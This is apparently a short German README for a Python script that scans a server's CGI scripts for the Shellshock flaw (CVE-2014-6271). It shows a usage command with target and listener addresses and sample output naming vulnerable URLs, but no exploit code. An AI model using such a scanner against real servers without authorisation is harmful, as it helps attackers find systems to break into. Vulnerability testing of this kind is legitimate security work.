
Ein Python-Skript zum Auflisten von CGI-Skripten, die anfällig für CVE-2014-6271 sind, auf einem bestimmten Server.
Ein Python-Skript zur Aufzählung von CGI-Skripten, die auf einem bestimmten Server anfällig für CVE-2014-6271 sind
$ python testing.py --server 172.16.255.130 --listen 172.16.255.1
##Beispiel-Rückgabe:
[+] Testing if 172.16.255.130 is vulnerable to CVE-2014-6271 via CGI
[+] Listening for incoming connections on the following socket 172.16.255.1:4443
[!] The server is vulnerable at the following URL: http://172.16.255.130/cgi-bin/status
[!] The server is vulnerable at the following URI: http://172.16.255.130/cgi-bin/ax.cgi
Besonderer Dank an https://github.com/Signus für die allgemeine Unterstützung bei der Threading- und Socket-Funktion
Twitter: @francisckrs